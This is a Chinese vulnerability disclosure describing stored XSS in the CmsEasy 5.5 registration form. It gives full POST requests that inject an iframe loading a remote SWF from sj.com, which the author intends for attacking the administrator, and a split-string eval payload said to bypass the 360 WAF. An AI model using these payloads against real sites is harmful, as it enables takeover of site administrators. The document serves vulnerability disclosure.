### 简要描述:
cmseasy 框架注入 可通过swf文件进行xss 跨后台 也可绕过360 直接xss
### 详细说明:
直接进入注册页面,然后发送数据包
url:
http://192.168.10.70/CmsEasy_5.5_UTF-8_20140818/uploads/index.php?case=user&act=register
postdata:
username=d1d1112d1d&password=111111&password2=111111&question=&answer=11111111&e_mail=admin%40admin.com'"><iframe src=http://sj.com/1.swf>&tel=010-10000000&address=admindasdada&verify=ssss&submit=+%E6%B3%A8%E5%86%8C+
这里我们的1.swf就是一个远程的flash文件,由于这里的src有长度限制,不过不要紧,对于每一个xsser来说应该都有一个短域名,这里我就不赘述了,在swf里面可以写xss 然后进行通信,打管理员,swf内容我就不写了,我们看一下这个框架注入的dom是否已经被插入进去:
[<img src="https://images.seebug.org/upload/201409/10111240cce5ddd5f0f7bf8dcfcaddc06b50edb1.png" alt="22.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/10111240cce5ddd5f0f7bf8dcfcaddc06b50edb1.png)
然后我们去后台看看该用户的信息:
[<img src="https://images.seebug.org/upload/201409/10111351fac51a8894257fea18f40cd3d2d595f7.png" alt="23.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/10111351fac51a8894257fea18f40cd3d2d595f7.png)
这里我们继续看第二个方法,直接产生一个xss:
url:
http://192.168.10.70/CmsEasy_5.5_UTF-8_20140818/uploads/index.php?case=user&act=register
postdata:
username=d111d111121d1d&password=111111&password2=111111&question=&answer=11111111&e_mail="><iframe src=javascript:a='al';b='ert';c='(1)';eval(a+b+c)>&tel=010-10000000&address=admindasdada&verify=ssss&submit=+%E6%B3%A8%E5%86%8C+
[<img src="https://images.seebug.org/upload/201409/101117281a6a2c66d6b1f2f56075b6c5f7ee9f85.png" alt="24.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/101117281a6a2c66d6b1f2f56075b6c5f7ee9f85.png)
在进入后台看看效果:
[<img src="https://images.seebug.org/upload/201409/10111937de5d5558567e864ad91260076b4f72c7.png" alt="25.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/10111937de5d5558567e864ad91260076b4f72c7.png)
我们点击一下看看:
成功执行.................
### 漏洞证明:
暂无评论